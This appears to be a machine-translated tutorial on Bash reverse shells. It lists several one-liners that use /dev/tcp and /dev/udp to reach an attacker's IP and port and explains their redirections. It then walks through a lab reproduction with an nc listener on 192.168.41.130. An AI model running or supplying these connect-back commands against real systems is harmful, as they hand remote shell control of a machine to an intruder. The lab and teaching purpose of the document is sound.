Bash rebound shell
Introduction to Bash
Shell, also known as terminal or shell, is the translator between people and the kernel, and Bash is the default Shell used in Linux
Bash reverse shell commands are as follows:
bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2
Next, we break down step by step and introduce these parameters in detail
"bash-i" means to open an interactive shell
The "&" symbol is used to distinguish between files and file descriptors. When the ">&" symbol is followed by a file, it means that the standard output and standard error output are redirected to the file. When the ">&" symbol is followed by a number, it means that the following number is File descriptor, without the "&" symbol, the following number will be regarded as a file. Numbers "0", "1", and "2" are file descriptors under LinuxShell, "0" refers to standard input redirection, "1" refers to standard output redirection, and "2" refers to error output redirection.
"tcp" and "udp" in the "/dev" directory are special devices in Linux, which can be used to establish a Socket connection. Reading and writing these two files is equivalent to transmitting data in a Socket connection. ">&/dev/tcp/attacker_ip/attacker port" means to redirect the standard output and standard error output to the "/dev/tcp/attacker ip/attacker port" file, that is, to redirect When the attack aircraft arrives, the command execution result of the target aircraft can be seen from the attack aircraft. "0>&1" or "0>&2" redirects the standard input to the standard output, and the standard output is redirected to the attack plane, so the standard input is also redirected to the attack plane, so that the command can be input through the attack plane, and You can see the command execution result output
Introduction to Experimental Environment
experimental topology
Machine name | IP | machine |
---|---|---|
attack machine | 192.168.41.130 | windows |
server | 192.168.41.132 | kali |
Experimental reproduction
The attacking machine uses nc to execute the monitoring command
#监听 TCP
nc64.exe -lvvp 9999
#监听UDP
nc64.exe -lup 9999
The experimental server executes the connection command
bash -i >&/dev/tcp/192.168.41.130/9999 0>&1
View the results and found that we successfully obtained the target server IP